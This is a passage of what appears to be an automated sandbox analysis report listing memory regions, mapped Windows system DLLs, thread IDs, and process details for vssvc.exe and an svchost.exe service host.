0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 289 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 290 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 291 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 292 start_va = 0x3a0000 
end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 293 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 294 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 297 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 298 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 299 start_va = 0xf0000 end_va = 0xfcfff entry_point = 0xf0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 300 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 301 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 302 start_va = 0x530000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 303 start_va = 0x6c0000 end_va = 0x1abffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 304 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 305 start_va 
= 0x1ac0000 end_va = 0x1ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ac0000" filename = "" Region: id = 306 start_va = 0x1b60000 end_va = 0x1bdffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 307 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 308 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 309 start_va = 0x1ad0000 end_va = 0x1ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 310 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 311 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 312 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 313 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 314 start_va = 0x1df0000 end_va = 0x20befff entry_point = 0x1df0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 315 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = 
"rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 328 start_va = 0x1c50000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 329 start_va = 0x20c0000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 330 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 331 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 332 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Thread: id = 2 os_tid = 0x988 Thread: id = 5 os_tid = 0x9a8 Thread: id = 6 os_tid = 0x9ac Thread: id = 7 os_tid = 0x9b0 Thread: id = 8 os_tid = 0x9b4 Process: id = "3" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x1b7ec000" os_pid = "0x9b8" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x984" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000531b8" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 333 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 334 start_va = 
0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 335 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 336 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 337 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 338 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 339 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 340 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x1d0000 region_type = mapped_file name = "vssvc.exe.mui" filename = "\\Windows\\System32\\en-US\\VSSVC.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssvc.exe.mui") Region: id = 341 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 342 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 343 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 344 start_va = 0x290000 end_va = 0x34ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 345 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 346 start_va = 0x370000 end_va = 0x3effff entry_point = 0x0 
region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 347 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 348 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 349 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 350 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 351 start_va = 0x830000 end_va = 0xc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 352 start_va = 0xc50000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 353 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 354 start_va = 0xe40000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e40000" filename = "" Region: id = 355 start_va = 0xfd0000 end_va = 0x104ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 356 start_va = 0x1050000 end_va = 0x131efff entry_point = 0x1050000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 357 start_va = 0x13b0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 358 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" 
(normalized: "c:\\windows\\system32\\user32.dll") Region: id = 359 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 360 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 361 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 362 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 363 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 364 start_va = 0xff330000 end_va = 0xff4bafff entry_point = 0xff330000 region_type = mapped_file name = "vssvc.exe" filename = "\\Windows\\System32\\VSSVC.exe" (normalized: "c:\\windows\\system32\\vssvc.exe") Region: id = 365 start_va = 0x7fef4860000 end_va = 0x7fef4873fff entry_point = 0x7fef4860000 region_type = mapped_file name = "xolehlp.dll" filename = "\\Windows\\System32\\xolehlp.dll" (normalized: "c:\\windows\\system32\\xolehlp.dll") Region: id = 366 start_va = 0x7fef7230000 end_va = 0x7fef7248fff entry_point = 0x7fef7230000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 367 start_va = 0x7fef7250000 end_va = 0x7fef729ffff entry_point = 0x7fef7250000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 368 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type 
= mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 369 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 370 start_va = 0x7fef9000000 end_va = 0x7fef9013fff entry_point = 0x7fef9000000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 371 start_va = 0x7fef9020000 end_va = 0x7fef9029fff entry_point = 0x7fef9020000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 372 start_va = 0x7fef9070000 end_va = 0x7fef9078fff entry_point = 0x7fef9070000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 373 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 374 start_va = 0x7fefb890000 end_va = 0x7fefb8a3fff entry_point = 0x7fefb890000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 375 start_va = 0x7fefb8b0000 end_va = 0x7fefb8c4fff entry_point = 0x7fefb8b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 376 start_va = 0x7fefb8d0000 end_va = 0x7fefb8dbfff entry_point = 0x7fefb8d0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: 
"c:\\windows\\system32\\netutils.dll") Region: id = 377 start_va = 0x7fefb8e0000 end_va = 0x7fefb8f5fff entry_point = 0x7fefb8e0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 378 start_va = 0x7fefc970000 end_va = 0x7fefc97bfff entry_point = 0x7fefc970000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 379 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 380 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 381 start_va = 0x7fefd290000 end_va = 0x7fefd2befff entry_point = 0x7fefd290000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 382 start_va = 0x7fefd340000 end_va = 0x7fefd353fff entry_point = 0x7fefd340000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 383 start_va = 0x7fefd5a0000 end_va = 0x7fefd5c2fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 384 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 385 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff 
entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 386 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 387 start_va = 0x7fefd970000 end_va = 0x7fefd989fff entry_point = 0x7fefd970000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 388 start_va = 0x7fefdb00000 end_va = 0x7fefdb35fff entry_point = 0x7fefdb00000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 389 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 390 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 391 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 392 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 393 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 394 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 395 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 396 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 397 start_va = 0x7feff300000 end_va = 0x7feff4d6fff entry_point = 0x7feff300000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 398 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 399 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 400 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 401 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 402 start_va = 
0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 403 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 404 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 405 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 406 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 407 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 408 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 409 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 410 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 411 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 412 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 413 start_va = 0x7fefbff0000 end_va = 0x7fefc00cfff entry_point = 0x7fefbff0000 region_type = mapped_file name = 
"samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 414 start_va = 0x360000 end_va = 0x360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 415 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 551 start_va = 0x7fefc540000 end_va = 0x7fefc66bfff entry_point = 0x7fefc540000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 552 start_va = 0x7fef4670000 end_va = 0x7fef46f4fff entry_point = 0x7fef4670000 region_type = mapped_file name = "catsrvut.dll" filename = "\\Windows\\System32\\catsrvut.dll" (normalized: "c:\\windows\\system32\\catsrvut.dll") Region: id = 553 start_va = 0x7fef4850000 end_va = 0x7fef485bfff entry_point = 0x7fef4850000 region_type = mapped_file name = "mfcsubs.dll" filename = "\\Windows\\System32\\mfcsubs.dll" (normalized: "c:\\windows\\system32\\mfcsubs.dll") Thread: id = 11 os_tid = 0x9d4 Thread: id = 12 os_tid = 0x9d0 Thread: id = 13 os_tid = 0x9cc Thread: id = 14 os_tid = 0x9c8 Thread: id = 15 os_tid = 0x9bc Thread: id = 16 os_tid = 0x9d8 Thread: id = 17 os_tid = 0x9dc Thread: id = 34 os_tid = 0x9e8 Thread: id = 61 os_tid = 0x918 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18692000" os_pid = "0xf0" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT 
AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ddc8" [0xc000000f], "LOCAL" [0x7] Region: id = 416 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 417 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 418 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 419 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 420 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 421 start_va = 0xc0000 end_va = 0x17ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 422 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 423 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 424 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 425 start_va = 0x220000 end_va 
= 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 426 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 427 start_va = 0x240000 end_va = 0x250fff entry_point = 0x240000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 428 start_va = 0x260000 end_va = 0x263fff entry_point = 0x260000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 429 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 430 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 431 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 432 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 433 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 434 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 435 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 436 start_va = 0x7c0000 end_va = 0xbb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 437 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000bc0000" filename = "" Region: id = 438 start_va = 0xc20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 439 start_va = 0xd00000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 440 start_va = 0xd80000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 441 start_va = 0xe70000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 442 start_va = 0xef0000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 443 start_va = 0xf70000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 444 start_va = 0x1080000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 445 start_va = 0x10a0000 end_va = 0x136efff entry_point = 0x10a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: 